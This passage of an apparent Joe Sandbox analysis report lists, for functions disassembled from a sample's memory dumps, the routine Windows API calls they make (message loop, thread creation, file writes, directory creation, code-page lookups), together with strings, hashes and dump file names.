                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                                              • String ID:
                                                                                                              • API String ID: 3177248105-0
                                                                                                              • Opcode ID: 54af6e6c9fb1ead2df5dd6bcd2aecb1ab3d68980011cff18f73b0eb5ce652faa
                                                                                                              • Instruction ID: 893f8bca0c52db7a24c9a293ec8b3701dbca69e7778208886f3b21afa1100a9c
                                                                                                              • Opcode Fuzzy Hash: 54af6e6c9fb1ead2df5dd6bcd2aecb1ab3d68980011cff18f73b0eb5ce652faa
                                                                                                              • Instruction Fuzzy Hash: 5B01D43264A2229BC7215B78AC48E5B3B98EF047B6B100632FA0AD7240F724DC41C6E9
                                                                                                              APIs
                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0045992F
                                                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00459940
                                                                                                              • TranslateMessage.USER32(?), ref: 0045994A
                                                                                                              • DispatchMessageW.USER32(?), ref: 00459954
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Message$DispatchPeekTranslate
                                                                                                              • String ID:
                                                                                                              • API String ID: 4217535847-0
                                                                                                              • Opcode ID: 33cf368ed5a9a92754fb920a40bbda8dea3c674aa3f0748d35d252840b6b3f77
                                                                                                              • Instruction ID: fee1817918a08a54908b365b9aff4d9dc4ff2d862b4d0157d3e2b5d1ff7a1599
                                                                                                              • Opcode Fuzzy Hash: 33cf368ed5a9a92754fb920a40bbda8dea3c674aa3f0748d35d252840b6b3f77
                                                                                                              • Instruction Fuzzy Hash: F0E0ED72C0212EA78B20ABE6AC4CCDF7F6CEE462657004425B91DD2000D668D555C7F5
                                                                                                              APIs
                                                                                                              • CreateThread.KERNELBASE(00000000,00010000,Function_0000FD61,?,00000000,00000000), ref: 0044FBD5
                                                                                                              • SetThreadPriority.KERNEL32(?,00000000), ref: 0044FC1C
                                                                                                                • Part of subcall function 00446DD3: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00446DF1
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Thread$CreatePriority__vswprintf_c_l
                                                                                                              • String ID: CreateThread failed
                                                                                                              • API String ID: 2655393344-3849766595
                                                                                                              • Opcode ID: 205066c6feada60438cdff868ca40c9704b336f770543f00c91a5d598efaf91f
                                                                                                              • Instruction ID: 38e8e4976d9ea8486360f35319d7afb4fb72170747c3490224bf322ad7db3399
                                                                                                              • Opcode Fuzzy Hash: 205066c6feada60438cdff868ca40c9704b336f770543f00c91a5d598efaf91f
                                                                                                              • Instruction Fuzzy Hash: F30126B1305309AFF2206FA8AC82FA7B359FB41711F20443FF946D6280CAA96845832C
                                                                                                              APIs
                                                                                                              • GetStdHandle.KERNEL32(000000F5,?,?,0044C853,00000001,?,?,?,00000000,0045420B,?,?,?,?,?,00453CB0), ref: 00449BE3
                                                                                                              • WriteFile.KERNEL32(?,00000000,?,00453EB8,00000000,?,?,00000000,0045420B,?,?,?,?,?,00453CB0,?), ref: 00449C23
                                                                                                              • WriteFile.KERNELBASE(?,00000000,?,00453EB8,00000000,?,00000001,?,?,0044C853,00000001,?,?,?,00000000,0045420B), ref: 00449C50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FileWrite$Handle
                                                                                                              • String ID:
                                                                                                              • API String ID: 4209713984-0
                                                                                                              • Opcode ID: d2b616cd99e0e2e52cbee3140ed49415e1c166f7e34aab14e60705e5adf4d563
                                                                                                              • Instruction ID: 348b2e8bce03862c283352d3fb0dd5e3e836600a1b48f790f96c57b8fb9aebb0
                                                                                                              • Opcode Fuzzy Hash: d2b616cd99e0e2e52cbee3140ed49415e1c166f7e34aab14e60705e5adf4d563
                                                                                                              • Instruction Fuzzy Hash: 1F312671108605AFFB208E14E888FA7B7A8FB51710F00411BF55497280C73DAC49EBAA
                                                                                                              APIs
                                                                                                              • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00449D92,?,00000001,00000000,?,?), ref: 00449EAD
                                                                                                              • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00449D92,?,00000001,00000000,?,?), ref: 00449EE0
                                                                                                              • GetLastError.KERNEL32(?,?,?,?,00449D92,?,00000001,00000000,?,?), ref: 00449EFD
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateDirectory$ErrorLast
                                                                                                              • String ID:
                                                                                                              • API String ID: 2485089472-0
                                                                                                              • Opcode ID: 021b48f8e3de6dad0eff2dab058290db94f424a4257b443db833e0b0516f7ffc
                                                                                                              • Instruction ID: e6a2d02c6041bf5a9698d8aa20f501eb9a5ce7260ec0ca51eef0052c95b5c341
                                                                                                              • Opcode Fuzzy Hash: 021b48f8e3de6dad0eff2dab058290db94f424a4257b443db833e0b0516f7ffc
                                                                                                              • Instruction Fuzzy Hash: B101CC31100258A6FB21EEA95C8AFEF3348AB06346F180457F804D2181DB6CCD85A6EE
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: H_prolog
                                                                                                              • String ID:
                                                                                                              • API String ID: 3519838083-0
                                                                                                              • Opcode ID: 0c0e61e796663af65d9e23cdafb163515554f0e39c1a1fbc31b8ee3260b9b50c
                                                                                                              • Instruction ID: 3d1a482e9e58b770c5203a130c069f29f6eb455133da2581ad65dbd1024e4f5c
                                                                                                              • Opcode Fuzzy Hash: 0c0e61e796663af65d9e23cdafb163515554f0e39c1a1fbc31b8ee3260b9b50c
                                                                                                              • Instruction Fuzzy Hash: 1311C170A023409BEB10EBB999457AEBAE4AF84304F04046FA849D7342DBBC5E08C356
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: H_prolog
                                                                                                              • String ID: CMT
                                                                                                              • API String ID: 3519838083-2756464174
                                                                                                              • Opcode ID: 553ed1939bdf4873bd9852becf5eca1c3f9b71da2d7318808f535ddc4f596762
                                                                                                              • Instruction ID: cd8215d569d78b5936a9626f8096e05fcdafc4b54198508fa9552dc3e9d8b3fe
                                                                                                              • Opcode Fuzzy Hash: 553ed1939bdf4873bd9852becf5eca1c3f9b71da2d7318808f535ddc4f596762
                                                                                                              • Instruction Fuzzy Hash: EE61D2B1500F44AAEB21DF30DC81AEBB7E8AF14706F44495FE59B87242DA397A48CF15
                                                                                                              APIs
                                                                                                              • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 004682E8
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Info
                                                                                                              • String ID:
                                                                                                              • API String ID: 1807457897-3916222277
                                                                                                              • Opcode ID: 6d987efb27466e71004213af618fed797f1bf9f876585919ff6f4020ddbcc026
                                                                                                              • Instruction ID: 13762e9811575f3c5fa2ce27b7fcdbcc62c0855c3209cadd1e04fb938ce20e35
                                                                                                              • Opcode Fuzzy Hash: 6d987efb27466e71004213af618fed797f1bf9f876585919ff6f4020ddbcc026
                                                                                                              • Instruction Fuzzy Hash: 3F413E705042489FDF218F148C84BF7BBE9DB45704F5405EED98986242FA395D85CF26
                                                                                                              APIs
                                                                                                              • __EH_prolog.LIBCMT ref: 00441DA6
                                                                                                                • Part of subcall function 00443AA3: __EH_prolog.LIBCMT ref: 00443AA8
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: H_prolog
                                                                                                              • String ID: CMT
                                                                                                              • API String ID: 3519838083-2756464174
                                                                                                              • Opcode ID: fd6ac81b7d7330e89bead4a11e15ff5d4ab70a1a807f1b9d0f0dc1840911b816
                                                                                                              • Instruction ID: 9c07ed41179126fdcf428a7ceb109d1a251acf39dfc2d85ac12c1a743abacfad
                                                                                                              • Opcode Fuzzy Hash: fd6ac81b7d7330e89bead4a11e15ff5d4ab70a1a807f1b9d0f0dc1840911b816
                                                                                                              • Instruction Fuzzy Hash: E7214D359002099FDB15EF99C9419EEFBF5BF5C304B20046EE845A3262CB365A54CB69
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: H_prolog
                                                                                                              • String ID: CMT
                                                                                                              • API String ID: 3519838083-2756464174
                                                                                                              • Opcode ID: 961fe7a1bed72a5bd6947e81a889d47aba9e59eb07d8d85b9da8371ed82b2939
                                                                                                              • Instruction ID: ac503a9bc202b3c5f3f38cc5e8ec53092c25d1ae1eae8b7f991f985c907264f7
                                                                                                              • Opcode Fuzzy Hash: 961fe7a1bed72a5bd6947e81a889d47aba9e59eb07d8d85b9da8371ed82b2939
                                                                                                              • Instruction Fuzzy Hash: B211B4B0A00201AFEB04DF65C4959BFFBAABF85304F04401FE80597351DB389991CB54
                                                                                                              APIs
                                                                                                              • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,F5E85006,00000001,?,000000FF), ref: 00467A7A
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: String
                                                                                                              • String ID: LCMapStringEx
                                                                                                              • API String ID: 2568140703-3893581201
                                                                                                              • Opcode ID: f5912523fba2415a5e17b65816483a8dd4d35ba76ad9b8ccf5cd5d9629a2ac29
                                                                                                              • Instruction ID: ced7e3888974caa1b0ca03640d95a51b1f77fb45282b2068763c59fa75d02c8d
                                                                                                              • Opcode Fuzzy Hash: f5912523fba2415a5e17b65816483a8dd4d35ba76ad9b8ccf5cd5d9629a2ac29
                                                                                                              • Instruction Fuzzy Hash: F9012972501209BBCF029F90DC05EEE7F62EF08715F108155FE0825161D63A9A71AB89
                                                                                                              APIs
                                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,0046709A), ref: 004679F2
                                                                                                              Strings
                                                                                                              • InitializeCriticalSectionEx, xrefs: 004679C2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CountCriticalInitializeSectionSpin
                                                                                                              • String ID: InitializeCriticalSectionEx
                                                                                                              • API String ID: 2593887523-3084827643
                                                                                                              • Opcode ID: c66df99a2d3b0e8dfaa63bbe249a8cdd45d43c291d789ddc0a37ab29089dbdfd
                                                                                                              • Instruction ID: eee577ffbaf46076cac24a2f16e6da6728702b7ffdecd38735435abbc02144b7
                                                                                                              • Opcode Fuzzy Hash: c66df99a2d3b0e8dfaa63bbe249a8cdd45d43c291d789ddc0a37ab29089dbdfd
                                                                                                              • Instruction Fuzzy Hash: 9FF05971A41208FBCB006F11DC06DDE7FA1DF04721B50817AFC0C66220DE7A8E10A7C9
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Alloc
                                                                                                              • String ID: FlsAlloc
                                                                                                              • API String ID: 2773662609-671089009
                                                                                                              • Opcode ID: cc16cd9fe41e1d0bd195b8b68fbc9377fcb6ffda1c42b07414dbd985875cb3d3
                                                                                                              • Instruction ID: c3699bf2ce8024e6ddce4cde9a90a2b8109b58341b26a7bd6e3ed9bf23444ff3
                                                                                                              • Opcode Fuzzy Hash: cc16cd9fe41e1d0bd195b8b68fbc9377fcb6ffda1c42b07414dbd985875cb3d3
                                                                                                              • Instruction Fuzzy Hash: 63E05570B46208BB8318BF249C0AAAE7B94CB44722B50407BFC0873251ED790E4082CE
                                                                                                              APIs
                                                                                                              • try_get_function.LIBVCRUNTIME ref: 00461DAF
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: try_get_function
                                                                                                              • String ID: FlsAlloc
                                                                                                              • API String ID: 2742660187-671089009
                                                                                                              • Opcode ID: 45e17ddab84a8e237d4003a42a704b2b07ccccce3395e14a815ae40ab33eecc4
                                                                                                              • Instruction ID: a30bd3d98dd665fcfeca20f6e0dda5d762a4460aee6b88ffa00efba1b7592c4a
                                                                                                              • Opcode Fuzzy Hash: 45e17ddab84a8e237d4003a42a704b2b07ccccce3395e14a815ae40ab33eecc4
                                                                                                              • Instruction Fuzzy Hash: C3D05B35F8322476D52036D9AC02BDA7F58CB00BB5F084067FF0C65362959E445055DE
                                                                                                              APIs
                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0045CD6E
                                                                                                                • Part of subcall function 0045CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0045CB39
                                                                                                                • Part of subcall function 0045CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0045CB4A
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                              • String ID: 3Ro
                                                                                                              • API String ID: 1269201914-1492261280
                                                                                                              • Opcode ID: 5d47847ffd883e85ae618d76070ea6bc84b943b3991e7c397294018b6e9bc82b
                                                                                                              • Instruction ID: 89e96c2f6c6ee12ef3a993ad2b7e167da2786784981209fda16bbacafaba57a6
                                                                                                              • Opcode Fuzzy Hash: 5d47847ffd883e85ae618d76070ea6bc84b943b3991e7c397294018b6e9bc82b
                                                                                                              • Instruction Fuzzy Hash: 5BB012E1299201BD31249209AE4AD7B072CC0C0F5A330C06FFC05D4042B94E0C4FC03F
                                                                                                              APIs
                                                                                                                • Part of subcall function 004681EB: GetOEMCP.KERNEL32(00000000,?,?,00468474,?), ref: 00468216
                                                                                                              • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,004684B9,?,00000000), ref: 0046868C
                                                                                                              • GetCPInfo.KERNEL32(00000000,004684B9,?,?,?,004684B9,?,00000000), ref: 0046869F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CodeInfoPageValid
                                                                                                              • String ID:
                                                                                                              • API String ID: 546120528-0
                                                                                                              • Opcode ID: 49b87638081b83e9dd9872492b0286addda36da95781a0d2ab77c98f8c737a0f
                                                                                                              • Instruction ID: 4bdfea9b293a4a132d595cc19ba592184d6df729f1efa29b0687403c53d6fa0a
                                                                                                              • Opcode Fuzzy Hash: 49b87638081b83e9dd9872492b0286addda36da95781a0d2ab77c98f8c737a0f
                                                                                                              • Instruction Fuzzy Hash: A85140709002058EDB208F36CC856BBBBE5EF41315F24426FD4868A252EE3D9946CB9B
                                                                                                              APIs
                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00452112
                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00452135
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Exception@8Throw
                                                                                                              • String ID:
                                                                                                              • API String ID: 2005118841-0
                                                                                                              • Opcode ID: 20bfeaa145877dbcc2da31c3534195e42a6dd81c74ff4425e771d6d7b73882b7
                                                                                                              • Instruction ID: e27789403f49c88b68b92bb2f502750d7af0310dba0a0fb6e117ee49605d3f50
                                                                                                              • Opcode Fuzzy Hash: 20bfeaa145877dbcc2da31c3534195e42a6dd81c74ff4425e771d6d7b73882b7
                                                                                                              • Instruction Fuzzy Hash: 5441E5B160A7816ED328DF34D58479AFB94BB56309F00051FEA5853243D7B9944CC79A
                                                                                                              APIs
                                                                                                              • __EH_prolog.LIBCMT ref: 00441383
                                                                                                                • Part of subcall function 00445FB1: __EH_prolog.LIBCMT ref: 00445FB6
                                                                                                                • Part of subcall function 0044C413: __EH_prolog.LIBCMT ref: 0044C418
                                                                                                                • Part of subcall function 0044C413: new.LIBCMT ref: 0044C45B
                                                                                                                • Part of subcall function 0044C413: new.LIBCMT ref: 0044C47F
                                                                                                              • new.LIBCMT ref: 004413FB
                                                                                                                • Part of subcall function 0044AC66: __EH_prolog.LIBCMT ref: 0044AC6B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
